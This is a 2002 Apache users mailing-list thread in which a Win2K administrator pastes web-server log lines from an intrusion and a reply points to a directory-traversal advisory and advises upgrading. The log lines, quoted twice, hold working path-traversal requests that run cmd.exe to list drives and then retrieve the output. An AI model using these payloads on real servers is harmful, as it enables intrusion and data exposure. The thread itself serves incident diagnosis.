You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Jere <je...@iki.fi> on 2002/11/07 16:31:55 UTC
[users@httpd] Security hole with Apache 2.0.39 & Win2K?
Greetings!
I'm sorry if this is something that has already been discussed, I just
joined the list. I tried to check out on this matter, but didn't find any
info elsewhere.
I found some suspicious stuff from my computer. First, there were files
named dirc.txt...dirg.txt in the root of my C:\ -drive. Plus, there was a
copy of Windows' cmd.exe renamed as root.exe
The txt files contained the root dir listings for the drives.
Then, I found this from my Apache log:
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\dirc.txt
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:52 +0300] "GET
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+d:>>c:\dird.txt
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:53 +0300] "GET
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+e:>>c:\dire.txt
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:55 +0300] "GET
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+f:>>c:\dirf.txt
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:56 +0300] "GET
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+g:>>c:\dirg.txt
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:01 +0300] "GET
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdird.txt HTTP/1.1" 200 0
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:03 +0300] "GET
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdire.txt HTTP/1.1" 200 0
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:05 +0300] "GET
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirf.txt HTTP/1.1" 200 0
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:07 +0300] "GET
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirg.txt HTTP/1.1" 200 0
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"
Then I surfed to the address mentioned in the HTTP request, finding what is
apparently some pages of a german speaking hacker (cracker?). You can type
in an IP address and you can see the directory listings for the root drives
for that machine. Seems it works at least with Apache 2.0.39 and Win2K that
I'm running. Or was, took it offline when I found this out.
So the question is, what is all this? Have I forgotten some installation
trick or what? I'm not that worried about the dir listing, but are there
more harmful things that can be done this way?
No viruses on my computer, I'm running Symantec antivirus, database just
updated. Also, ZoneAlarm should keep most of the unwanted guests away.
Thanks for any help,
Jere
--
Jere Knuuttila They took one look at me and said, "Oh my god",
jere@iki.fi get a haircut and get a real job!
+358 50 585 3949 George Thorogood - Haircut
http://jere.iki.fi
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security hole with Apache 2.0.39 & Win2K?
Posted by Jacob Coby <jc...@listingbook.com>.
http://www.cgisecurity.com/archive/webservers/apache-pre-2.0.40-dir-transver
sal-bug.txt You should upgrade Apache.
----- Original Message -----
From: "Jere" <je...@iki.fi>
To: <us...@httpd.apache.org>
Sent: Thursday, November 07, 2002 10:31 AM
Subject: [users@httpd] Security hole with Apache 2.0.39 & Win2K?
>
> Greetings!
>
> I'm sorry if this is something that has already been discussed, I just
> joined the list. I tried to check out on this matter, but didn't find any
> info elsewhere.
>
> I found some suspicious stuff from my computer. First, there were files
> named dirc.txt...dirg.txt in the root of my C:\ -drive. Plus, there was a
> copy of Windows' cmd.exe renamed as root.exe
> The txt files contained the root dir listings for the drives.
>
> Then, I found this from my Apache log:
>
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET
>
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/
c+dir+c:>>c:\dirc.txt
> HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:52 +0300] "GET
>
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/
c+dir+d:>>c:\dird.txt
> HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:53 +0300] "GET
>
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/
c+dir+e:>>c:\dire.txt
> HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:55 +0300] "GET
>
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/
c+dir+f:>>c:\dirf.txt
> HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:56 +0300] "GET
>
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/
c+dir+g:>>c:\dirg.txt
> HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET
> /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237
> "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:01 +0300] "GET
> /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdird.txt HTTP/1.1" 200 0
> "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:03 +0300] "GET
> /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdire.txt HTTP/1.1" 200 0
> "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:05 +0300] "GET
> /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirf.txt HTTP/1.1" 200 0
> "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1)"
> p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:07 +0300] "GET
> /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirg.txt HTTP/1.1" 200 0
> "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1)"
>
> Then I surfed to the address mentioned in the HTTP request, finding what
is
> apparently some pages of a german speaking hacker (cracker?). You can type
> in an IP address and you can see the directory listings for the root
drives
> for that machine. Seems it works at least with Apache 2.0.39 and Win2K
that
> I'm running. Or was, took it offline when I found this out.
>
> So the question is, what is all this? Have I forgotten some installation
> trick or what? I'm not that worried about the dir listing, but are there
> more harmful things that can be done this way?
>
> No viruses on my computer, I'm running Symantec antivirus, database just
> updated. Also, ZoneAlarm should keep most of the unwanted guests away.
>
> Thanks for any help,
> Jere
>
>
> --
> Jere Knuuttila They took one look at me and said, "Oh my god",
> jere@iki.fi get a haircut and get a real job!
> +358 50 585 3949 George Thorogood - Haircut
> http://jere.iki.fi
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org